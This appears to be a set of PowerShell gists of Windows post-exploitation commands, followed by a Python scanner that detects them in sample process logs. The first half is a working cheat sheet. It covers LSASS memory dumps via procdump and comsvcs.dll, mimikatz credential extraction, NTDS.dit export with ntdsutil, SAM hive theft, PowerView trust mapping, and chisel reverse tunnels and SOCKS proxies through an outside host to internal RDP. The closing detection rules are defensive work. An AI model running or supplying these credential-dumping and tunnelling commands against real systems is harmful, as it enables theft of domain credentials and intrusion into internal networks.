```powershell
dir "Registry::HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" -Name
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
```
```powershell
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# in the mimikatz console, parse the dump offline
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords

# Dump LSASS with rundll32
rundll32.exe C:\Windows\System32\comsvcs.dll #24 "<PID> lsass.dmp full"
rundll32.exe comsvcs.dll #24 "<PID> lsass.dmp full"
```
```powershell
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
```
```powershell
./chisel_linux_amd64 server -p 8080 --reverse -host 1.1.1.1
Start-Process C:\chisel.exe -ArgumentList "client 1.1.1.1:8080 R:9000:172.30.10.28:3389" -WindowStyle Hidden

# TUN:
# c:
chisel.exe client ipsrv:port R:8001:127.0.0.1:9001
# s:
chisel.exe server -p 9001 --socks5
```
```powershell
nltest.exe /trusted_domains
```
```powershell
Get-ADComputer -Properties * -Filter {(OperatingSystem -like "*Windows S*")} | Sort Description | FT Name,Description,OperatingSystem -AutoSize | Out-String -Width 300 | Out-File ServerListing.csv
```
```powershell
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest())[0].RootDomain.Name
(New-Object System.Security.Principal.NTAccount("testlab.local","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
```
```powershell
# Demo for the 44con "Trusts You Might Have Missed" presentation
# HarmJ0y

# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1

# map all reachable domain trusts
Invoke-MapDomainTrust
```
```powershell
cd c:\users
Get-ChildItem | ForEach-Object {
    $class = if ($_.PSIsContainer) { "Win32_Directory" } else { "CIM_DataFile" }
    Get-WMIObject $class -Filter "Name = '$($_.FullName -replace '\\','\\')'" | Select-Object -ExpandProperty EightDotThreeFileName
}
```
```powershell
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv
```
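The credential-dumping commands collected in these gists (procdump and comsvcs.dll LSASS dumps, ntdsutil IFM export, `reg save` of the SAM/SYSTEM hives, mimikatz `sekurlsa`/`lsadump` modules) each leave a distinctive process command line. As an added defender-side example that is not part of any gist above, this Python scanner applies regex rules for those patterns to process-creation records; the Sysmon-like `key=value` layout and the sample lines are constructed assumptions, not real telemetry.

```python
import re

# Detection rules for the credential-dumping command lines shown in the gists.
# Each entry: (rule name, regex applied to the full command line).
RULES = [
    ("lsass_dump_comsvcs_minidump",
     re.compile(r"rundll32(\.exe)?\s+.*comsvcs\.dll[ ,]+(#?24|MiniDump)\b", re.I)),
    ("lsass_dump_procdump",
     re.compile(r"procdump(64)?(\.exe)?\s+.*-ma\s+lsass(\.exe)?", re.I)),
    ("ntds_dump_ntdsutil_ifm",
     re.compile(r"ntdsutil(\.exe)?\s+.*\bifm\b.*\bcreate\s+full\b", re.I)),
    ("sam_system_hive_export",
     re.compile(r"\breg(\.exe)?\s+save\s+(HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)\b", re.I)),
    ("mimikatz_sekurlsa_lsadump",
     re.compile(r"\b(sekurlsa|lsadump)::\w+", re.I)),
]

def parse_cmdline(line: str) -> str:
    """Pull the CommandLine field out of a key=value process-creation record (assumed layout)."""
    m = re.search(r"CommandLine=(.*)$", line)
    return m.group(1).strip() if m else ""

def match_rules(cmdline: str) -> list[str]:
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Return (record number, command line, matched rules) for each suspicious record."""
    hits = []
    for n, line in enumerate(lines, 1):
        cmd = parse_cmdline(line)
        rules = match_rules(cmd)
        if rules:
            hits.append((n, cmd, rules))
    return hits

# Constructed sample records (not real telemetry); the last two are benign rundll32/notepad noise.
SAMPLE_LOG = [
    'EventID=1 Image=C:\\Windows\\System32\\rundll32.exe CommandLine=rundll32.exe C:\\Windows\\System32\\comsvcs.dll #24 "652 lsass.dmp full"',
    'EventID=1 Image=Z:\\procdump.exe CommandLine=Z:\\procdump.exe -accepteula -ma lsass.exe lsass.dmp',
    'EventID=1 Image=C:\\Windows\\System32\\ntdsutil.exe CommandLine=ntdsutil "ac i ntds" "ifm" "create full c:\\temp" q q',
    'EventID=1 Image=C:\\Windows\\System32\\reg.exe CommandLine=reg save HKLM\\SAM SamBkup.hiv',
    'EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\Users\\alice\\notes.txt',
    'EventID=1 Image=C:\\Windows\\System32\\rundll32.exe CommandLine=rundll32.exe shell32.dll,Control_RunDLL',
]

if __name__ == "__main__":
    for n, cmd, rules in scan(SAMPLE_LOG):
        print(f"record {n}: {', '.join(rules)} :: {cmd}")
```

The rules key on the argument shapes these tools require (the `#24`/`MiniDump` export, `-ma lsass`, `ifm` plus `create full`, the hive names), so renaming the binary alone does not evade them; a renamed procdump or comsvcs.dll copy still needs those arguments.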